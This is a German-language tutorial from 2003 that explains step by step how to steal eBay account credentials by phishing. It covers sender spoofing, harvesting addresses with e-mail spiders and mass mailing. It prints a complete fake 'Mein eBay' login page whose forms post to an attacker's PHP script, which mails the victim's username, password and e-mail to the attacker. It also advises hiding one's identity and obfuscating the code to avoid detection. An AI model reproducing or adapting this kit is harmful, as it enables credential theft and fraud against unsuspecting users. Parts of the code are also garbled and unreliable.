Gecoded by S.M. ( alias SevenUp )
Wie komme ich schnell an eBay Zugangsdaten?
Info:
Mit diesem kleinen Tutorial will ich euch ?etwas? Klarheit schaffen.
Wir haben sicherlich alle schon gehört, das die üblichen Wege sehr umständlich sind
( E-Mail Adressen spoofen, Passwörter hacken usw. ) Aber doch IMMER Funktioniert
haben siehe TV-Reportagen.
Ich habe wiederum ein weg gefunden, es anders zu machen.
Sicherlich sagen jetzt die einen oder anderen ? sehr unsicher ?? !
Aber ist es nicht unsicher, Passwörter zu hacken oder irgendwelche E-Mail
Accounts ?
Eines müssen wir uns IMMER vor Augen halten:
1.) Allein der Versuch ist Strafbar!
2.) Erst recht, es in die Tat umzusetzen! :-)
3.) Hacken oder der gleichen wird mit sehr HOHEN strafen gehandelt!
Dieses Tutorial soll euch in erster Linie nicht dazu verleiten es nachzumachen. Ihr
müsst selber wissen ob es euch sicher oder unsicher ist. ( Denkt an die Folgen !!! )
Ok lange rede kurzer sinn wir fangen endlich an *g*
Wie alles Anfing:
Ich saß wie immer vor meinem Rechner und programmierte irgendwelche
Webanwendungen.
Da ich schon immer neugierig auf fremde Accounts war, wie auch dieses Mal kam
mir die Idee mich mal an eBay zu ?versuchen?.
Man hat ja mehr wie einmal in den Nachrichten darüber gehört J
Also ?suchte? ich nach etwas was Wirkung zeigen sollte.
Mir kam die Idee den ahnungslosen eBay Usern eine fake Mail unterzujubeln.
Sicherlich weiß ich nicht wer alles eBay User ist, aber wie wir alle wissen ist eBay
Marktführer mit fast 80 %.
Daher sind auch fast alle Deutschen Internet-User bei eBay Registriert J
Also wusste ich nun was ich wollte ?.. musste es nur noch in die Tat umsetzen!
Was muss ich wissen:
Von Vorteil wäre es natürlich Kenntnisse in:
1.) HTML (Hypertext Mark-up Language )
2.) PHP (Hypertext Preprocessor )
Zu haben.
Was heisst eigentlich HTML ?
HTML ist die Abkürzung für ,,Hypertext Mark-up Language`` und kann eigentlich gar nicht
übersetzt werden. Gemeint ist damit, daß es sich bei HTML um eine formale Sprache wie z.B.
BASIC, Pascal oder C handelt, mit der in einem Hypertext-Dokument bestimmte
Formatierungen vorgenommen werden können.
Ein Hypertext-Dokument ist erstmal ein ganz normales Text-Dokument mit drei
entscheidenden Erweiterungen:
? Es kann außer Text auch andere, informationsübermittelnde Elemente wie Grafiken,
Bilder, Animationen, Töne usw. enthalten.
? Es kann Verbindungen zwischen sich selbst und anderen Hypertext-Dokumenten
enthalten.
? Es kann Antworten vom Leser entgegennehmen und entsprechend der Antwort sein
Verhalten ändern.
Natürlich ist diese ,,Definition`` weder vollständig noch ,,wissenschaftlich`` exakt, aber es
reicht mal, um überhaupt zu wissen, womit wir es zu tun haben.
Was ist PHP?
PHP PHP (Akronym für "PHP: Hypertext Preprocessor") ist eine weit verbreitete und
für den allgemeinen Gebrauch bestimmte Open Source Skriptsprache, welche
speziell für die Webprogrammierung geeignet ist, und in HTML eingebettet werden
kann.
Woführ alles:
KA. Findet es selber raus ? J
Auf Basis aufbauen:
Was nun ausführlich hier beschrieben wird, baut alles auf eine Fake Mail hin, die wir
an die Internet User schicken wollen.
Wichtig:
1.) Der Absender der Mail MUSS von eBay selber stammen!!!! Z.b.: aw-
Sonst braucht ihr ab hier nicht mehr weiter lesen ? 2.) Im Betreff so was wie Ihre Sicherheit?Wichtige Daten?Account Sperrung
etc. So das der Internet User sofort stutzig wird und die Mail öffnet.
Ab hier an überlassen wir es dem User wie er vorgeht?Habt ihr vorher alles richtig
gemacht?und keine Fehler hinterlassen ?!
Merke
Der Absender ist eBay selber (
) oder ( )Alle Daten + Script wird direkt vom eBay Server geholt.
Alle Links weisen auf
.Nichts fällt im ersten Moment auf?. ODER ????
Das ist gut der Internet User Ließt sich ab hier an alles durch?.Selbst wenn er in den
E-Mail Quelltext schaut es darf nichts auffallen denn dann ist?s vorbei mit lustig J
Das Script Was ist es:
Es baut auf HTML und PHP auf.
Einfach gesagt es ist nichts anderes als eine eBay ( Mein eBay ) Login Seite.
Nur etwas modifiziert ?
Der User hat in der Mail das modifizierte mein-eBay vor sich.
Darauf wird er von eBay hingewiesen, seine Aktuellen Account Daten in das
Formular einzutragen.
Und an der User Ident teilzunehmen.
Sollte er auf diese Mail nicht reagieren, so würde aus Sicherheitsgründen sein
Zugang vorläufig gesperrt, bis er an diesem einmaligen Verfahren teilgenommen hat.
Laut meiner Statistik:
80% der Internet User sind bei eBay registriert
Schickt man nun 500 Mails raus ? Antworten darauf ca. ? 300-400 User
Siehe gleich Beispiel Bilder unten
Wenn ich alles habe, wie versende ich?
Das ist das kleinste Problem!!!
Es gibt im Internet genügend Free/Shareware Programme die dies ermöglichen.
Näheres später dazu!
1.) Absender eintragen
2.) Empfänger eintragen
3.) Betreff eintragen
4.) HTML-Code eintragen
Wie bekomme ich so viele Email-addy?s?
Dies ist auch kein Problem!!!
Gute Programme sind z.B.: FAST EMAIL SPIDER, SPIDER EMAIL etc. ?.
Einfach mal in
gehen und diese Begriffe eintippen.Der ORIGINALE HTML CODE: ( Für E-Mail )
<html>
<head>
<!--extraneous meta tag removed by ebay code -->
<!--srcId: SignIn-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<title>Mein eBay</title></head>
<body bgcolor="#ffffff" onload="initFocus();"><a href="http://pages.ebay.de/">
</a></td></tr></table><table border="0" cellpadding="0" cellspacing="0" width="600"> <tr>
<td colspan="2">
</td> </tr>
<tr>
<td colspan="2" bgcolor="#ffcc00">
</td> </tr>
<tr bgcolor="#ffe580">
<td width="25">
</td> <td width="575" valign="middle">
<table border="0" width="100%" cellpadding="1" cellspacing="0">
<tr>
<td nowrap="yes" valign="middle">
<font face="Verdana, Helvetica, Arial, sans-serif" size="3">Mein eBay</font>
</td>
<td align="right" nowrap="yes" valign="middle">
<font face="Arial, Helvetica, sans-serif" size="2">
</font>
</td> </tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" bgcolor="#ffcc00">
</td> </tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="600">
<tr bgcolor="#ffffcc">
<td width="15" height="23">
</td> <td width="180" height="23" nowrap="yes">
<font face="Arial, Helvetica, sans-serif" size="2">Wichtige Informationen</font></td>
<td colspan="3" align="center" valign="bottom" height="23">
</td> <td width="310" height="23" nowrap="yes">
<font face="Arial, Helvetica, sans-serif" size="2">Bitte Aktualisieren Sie Ihre
Daten!</font></td>
</tr>
<tr>
<td width="15">
</td> <td valign="top" width="180">
<form method="post" name="RegisterEnterInfo" action="http://www.meine-seite.de/mail.php"><input type="hidden"
name="MfcISAPICommand" value="RegisterEnterInfo"><input type="hidden" name="co_partnerId" value="2"><input
type="hidden" name="siteid" value="77"><input type="hidden" name="ru" value="http://cgi1.ebay.de/aw-
cgi/eBayISAPI.dll?MyEbayLogin&pass={_pass_}&userid=">< input type="hidden" name="bin" value="174"><table
border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td>
</td> </tr>
<tr>
<td valign="top">
<font face="Arial, Helvetica, sans-serif" size="2">Da wir zur Zeit einige
Kontrollen durchführen, bitten wir um Ihre Mithilfe. Senden Sie uns eine
Bestätigungs-E-Mail mit Ihren Aktuellen Account Daten die wir im System
zuordnen können.</font>
Ihr eBay Team </td>
</tr>
</table>
</form>
</td>
<td>
</td><td valign="top" align="center" bgcolor="#CCCCCC" width="1">
</td><td>
</td><td>
<form method="post" name="SignInForm" action="http://www.meine-seite.de/mail.php"><input type="hidden"
name="MfcISAPICommand" value="SignInWelcome"><input type="hidden" name="siteid" value="77"><input type="hidden"
name="co_partnerId" value="2"><input type="hidden" name="UsingSSL" value="0"><input type="hidden" name="ru"
value="http://cgi1.ebay.de/aw-cgi/eBayISAPI.dll?MyEbayLogin&pass={_pass_}&userid=">< input type="hidden"
name="pp" value="pass"><input type="hidden" name="pa1" value=""><input type="hidden" name="pa2" value=""><input
type="hidden" name="pa3" value=""><input type="hidden" name="i1" value="0"><input type="hidden" name="pageType"
value="174"><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td>
</td></tr>
<tr>
<td valign="top">
<font face="Arial, Helvetica, sans-serif" size="2">Füllen Sie bitte alle Felder
sorgfältig aus. Da wir Ihren Account sonst nicht richtig im System zuordnen
können.
</font></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%" height="195">
<tr>
<td height="19">
eBay-Mitgliedsname</td>
</tr>
<tr>
<td valign="top" height="22">
<input type="text" name="eBay_Mitgliedsname" size="27"></td><td height="22">
</td><td height="22">
</td>
</tr>
<tr>
<td valign="top" height="19"><font face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666">Haben Sie Ihren
Mitgliedsnamen
?</font> </td> <td height="19">
</td><td height="19">
</td>
</tr>
<tr>
<td valign="top" height="15"></td><td height="15">
</td><td height="15">
</td>
</tr>
<tr>
<td valign="top" height="19">Passwort</td><td height="19">
</td><td height="19">
<? echo $err_eBay_Mitgliedsname ?>
</td>
</tr>
<tr>
<td valign="top" height="22">
<input type="text" name="Passwort" size="27"></td><td height="22">
</td><td height="22">
</td>
</tr>
<tr>
<td valign="top" height="19"><font face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666">Haben Sie Ihr
</font> </td> <td height="19">
</td><td height="19">
<? echo $err_Passwort ?>
</td>
</tr>
<tr>
<td valign="top" height="19"></td><td height="19">
</td><td height="19">
</td>
</tr>
<tr>
<td valign="top" height="19">Ihre E-Mail</td><td height="19">
</td><td height="19">
<? echo $err_Ihre_E_mail ?>
</td>
</tr>
<tr>
<td height="22">
<input type="text" name="Ihre_E_mail" size="27"></td><td height="22"></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td>
</td> </tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="350">
<tr>
<td width="35%"><input type="submit" name="submit" value="Absenden"></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td>
</td> </tr>
<tr>
<td valign="top"><input type="checkbox" name="keepMeSignInOption" value="1" tabindex="4"></td>
<td width="10"> </td>
<td width="100%">
<font face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666"><a
href="http://pages.ebay.de/help/new/staying_signed_in.html" target="helpwin" onclick="return openHelpWindow(this.href);">Ich
möchte auf diesem Computer eingeloggt bleiben</a>, bis ich mich abmelde.</font>
</td>
</tr>
<tr>
<td colspan="3">
<hr width="100%" size="1" color="#CCCCCC">
<font face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666">
</font>
</td>
</tr>
</table>
</form>
</td>
</tr>
<tr>
<td width="15">
</td> <td colspan="5">
<HR color="#CCCCCC" noshade="yes" size="1">
</td>
</tr>
<tr>
<td width="15">
</td> <td colspan="5">
<font face="Arial, Helvetica, sans-serif" size="2">Sie können sich auch über den folgenden Dienst anmelden oder
einloggen:</font>
</td>
</tr>
<tr>
<td width="15">
</td> <td colspan="5">
<a href="http://cgi3.ebay.de/aw-cgi/eBayISAPI.dll?PassportSignInShow&pt=174&finalURL=h ttp%3A%2F%2Fcgi1.ebay.de%2Faw-
cgi%2FeBayISAPI.dll%3FMyEbayLogin%26pass%3D%7B_pas s_%7D%26userid%3D">
</a></td> </tr>
</table>
<table width="599" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFCC00">
<tr>
<td height="2">
</td> </tr>
</table><script SRC="http://include.ebay.com/aw/pics/js/stats/ss.js"></SCRIPT><script
SRC="http://include.ebay.com/aw/pics/js/stats/ss2.js"></SCRIPT><table border="0" cellpadding="0" cellspacing="0"
width="600">
<tr>
<td colspan="2">
<font size="2" face="Arial, Verdana, Helvetica, sans-serif">
<HR WIDTH="500" ALIGN="CENTER">
<div
align="center">
|
|
|
|
</p> |
|
|
|
|
|
|
|
</p> </div>
</font>
</td>
</tr>
<tr>
<td width="600" height="31" valign="top" align="left">
<font size="1" face="Arial, Verdana, Helvetica, sans-serif">Copyright © 1995-2003 eBay Inc.
Alle Rechte vorbehalten.
Ausgewiesene Marken gehören ihren jeweiligen Eigentümern. Mit der
Benutzung dieser Seite erkennen Sie die eBay-
und die an.eBay übernimmt keine
für den Inhalt verlinkter externer Internetseiten.
</font>
</td>
</tr>
</table><script LANGUAGE="JavaScript"><!--
var cbc, cbf;
if (cbc){
writeFooter();
if (cbf){
fullCB();
}
}
//--></SCRIPT></body>
</html>
SCRIPT ENDE
PHP FORMULAR SCRIPT: ( mail.php )
<?
function check_len(&$check, $field, $max, &$err_field, $err="")
{
if (strlen($field) > $max)
{
if ($err == "")
{
$err = $msg->err_maxlen($max);
}
$err_field = $err;
if ($check==true) $check = false;
}
}
function check_mail(&$check, $fld, &$error_field, $invalidchars="", $blanks="")
{
global $msg;
$expr = "^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z][a-z]+\$";
//echo "expr=" . $expr . "
";
if ((!$fld) || ($fld=="") || (!eregi($expr,$fld)))
{
if ($invalidchars > "")
{
$error_field = $invalidchars . "
\n";
} else {
$error_field = "invalid characters
\n";
}
if ($check==true) $check =false;
}
if (strrpos($fld,' ') > 0)
{
if ($blanks > "")
{
$error_field = $blanks . "
\n";
} else {
$error_field = "blanks in e-mail
\n";
}
if ($check==true) $check =false;
}
}
if (empty($eBay_Mitgliedsname)) $eBay_Mitgliedsname="";
if (empty($err_eBay_Mitgliedsname)) $err_eBay_Mitgliedsname="";
if (empty($Passwort)) $Passwort="";
if (empty($err_Passwort)) $err_Passwort="";
if (empty($Ihre_E_mail)) $Ihre_E_mail="";
if (empty($err_Ihre_E_mail)) $err_Ihre_E_mail="";
$checked = true;
if (isset($submit))
{
check_len($checked, $eBay_Mitgliedsname,40,$err_eBay_Mitglie dsname,"Eingabe zu lang! Maximale Länge:40");
check_len($checked, $Passwort,40,$err_Passwort,"Eingabe zu lang! Maximale Länge:40");
check_len($checked, $Ihre_E_mail,40,$err_Ihre_E_mail,"Eingab e zu lang! Maximale Länge:40");
}
if ( empty($submit) or (!$checked) )
{
?>
<form action="formmailer.php" method="post"><table cellpadding="4" border="0">
<tr><td valign="top">eBay-Mitgliedsname</td><td>
<input type="text" name="eBay_Mitgliedsname" value="<? echo $eBay_Mitgliedsname ?>">
</td><td>
<? echo $err_eBay_Mitgliedsname ?>
</td></tr>
<tr><td valign="top">Passwort</td><td>
<input type="text" name="Passwort" value="<? echo $Passwort ?>">
</td><td>
<? echo $err_Passwort ?>
</td></tr>
<tr><td valign="top">Ihre E-Mail</td><td>
<input type="text" name="Ihre_E_mail" value="<? echo $Ihre_E_mail ?>">
</td><td>
<? echo $err_Ihre_E_mail ?>
</td></tr>
<tr><td></td><td><input type="submit" name="submit" value="Absenden"></td></tr>
<tr><td colspan="2">
</td></tr>
<tr><td colspan="2">
</td></tr>
</table></form>
<?
}
if (isset($submit) and ($checked) ) {
$msg = "Alle Daten wurden erfolgreich an unsere eBay Server übermittelt\n";
$msg .= "eBay_Mitgliedsname=$eBay_Mitgliedsname\ n";
$msg .= "Passwort=$Passwort\n";
$msg .= "Ihre_E_mail=$Ihre_E_mail\n";
mail("
","eBay Account Daten", $msg);
echo "Email wurde gesendet an:
\n";
echo nl2br($msg) . "
\n";
}
?>
SCRIPT ENDE
Info zu den Scripten:
Das HTML Script kopiert ihr in ALLE E-Mail Adressen die ihr euch besorgt habt J
Diese könnt ihr benennen wie ihr wollt ( sieht man nicht ) *fg*
Das PHP Script ist das wichtigste!!!! Ohne das läuft nix !!!
Da besorgt Ihr euch einen FREE Web Account der PHP unterstützt.
Nicht auf euren Real Namen Registrieren lassen *LOL*
Sonst habt Ihr bald Besuch vor euer Haustür?..*g*
Fassen wir nun ALLES Zusammen:
1.) Man braucht das HTML-Script von eBay, so das es sich später direkt über E-
Mail versenden lässt ( direkter Versand ) NICHT Outlook.
2.) Die Empfänger bekommen eine E-Mail von
darauf werden sie hingewiesen, ihre Aktuellen Account Daten einzutragen. Die
Eingegebenen Daten verschicken sich nun selbstständig an eine FREEMAIL (
Ihr )
3.) Das Script was benötigt wird, bastelt man sich in einem HTML-Editor oder
einem Text-Editor.
4.) Man benötigt einen E-Mail Spider der dir die E-Mail Adressen sammelt.
5.) Nun kopiert man das fertige HTML Script in einen E-Mail Sender.
6.) Das PHP Script lädt man auf einen FREE WEBSPACE SERVER. Denn der
regelt zu aller letzt den Mail versand.
7.) GANZ WICHTIG !!! DAS PHP SCRIPT UND DAS HTML SCRIPT MUSS
CODIERT SEIN DAMIT MAN DEN QUELLCODE NICHT AUSLESEN KANN
8.) Zu finden ist solche Codier ?Software? in
unter HTML Codieren.
9.) Das Script lädt sich nun teilweise von
selber und zu anderen teil von eurem FREE WEBSPACE Server. Deswegen auch das HTML Script
sowie PHP Script Verschlüsseln.
10.) Zusammengefasst hasst du dann eine Coole ?Web-Software? für deine
Account Daten zu sammeln J
11.) Nun musst du nur ein paar mal deine Free Mail Adresse abrufen und
nach neunen Account Daten schauen.
Tutorial Ende!!!!
Hab ihr fragen oder Kritik ?
Dann Mailt mir unter
05.September 2003 by SevenUp
----------------------------------------------------------------------------------------------------
Das Original schicke ich euch gerne wenn ihr mir ne PM mit dem Betreff: "Ebay" zukommen lasst
n hack 
